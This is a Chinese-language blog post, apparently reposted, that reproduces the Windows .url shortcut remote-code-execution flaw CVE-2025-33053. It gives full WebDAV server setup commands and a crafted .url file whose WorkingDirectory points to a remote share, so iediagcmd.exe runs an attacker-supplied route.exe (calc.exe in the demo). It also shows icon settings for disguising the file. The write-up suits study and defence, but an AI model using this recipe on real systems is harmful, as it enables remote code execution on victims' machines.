CVE-2025-33053 网络快捷方式文件远程代码执行漏洞
CVE-2025-33053 网络快捷方式文件远程代码执行漏洞
背景
微软6月修复了一个网络快捷方式的漏洞,由checkpoint捕获的APT组织Stealth Falcon样本中发现的。
复现
设置.url文件的WorkingDirectory为远程恶意服务器的webdav文件夹, 在打开时会调用iediagcmd.exe, 进而调用同目录下的route.exe, 因为工作文件夹设置成了恶意服务器上的路径, 就会启动恶意服务器的route.exe, 具体复现如下:
创建webdav服务器
安装:
sudo apt update && sudo apt upgrade -y
sudo apt install apache2 apache2-utils -y
sudo a2enmod dav
sudo a2enmod dav_fs
sudo systemctl restart apache2
sudo mkdir -p /var/www/webdav
sudo chown www-data:www-data /var/www/webdav
sudo chmod 755 /var/www/webdav
sudo vim /etc/apache2/sites-available/webdav.conf配置文件:
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/webdav
<Directory /var/www/webdav>
Options Indexes FollowSymLinks
AllowOverride None
DAV On
Require all granted
</Directory>
ErrorLog ${APACHE_LOG_DIR}/webdav_error.log
CustomLog ${APACHE_LOG_DIR}/webdav_access.log combined
</VirtualHost>重启:
sudo a2ensite webdav.conf
sudo a2dissite 000-default.conf
sudo systemctl reload apache2从本地计算机复制一份iediagcmd.exe到webdav文件夹, 然后把calc.exe复制到webdav文件夹里。
制作URL文件
新建一个txt,写入以下内容,WorkingDirectory设置为远程服务器的路径:
[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\192.168.146.138@80/DavWWWRoot\
ShowCommand=7
IconIndex=70
IconFile=C:\Windows\System32\SHELL32.dll可以通过IconFile和IconIndex来设置url文件的图标
最终效果
参考
CheckPoint的文章(https://research.checkpoint.com/2025/stealth-falcon-zero-day/)
免责声明
本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本平台和发布者不为此承担任何责任。
本文是转载文章,版权归原作者所有。建议访问原文,转载本文请联系原作者。
阅读建议
评论
匿名评论
隐私政策
你无需删除空行,直接评论以获取最佳展示效果
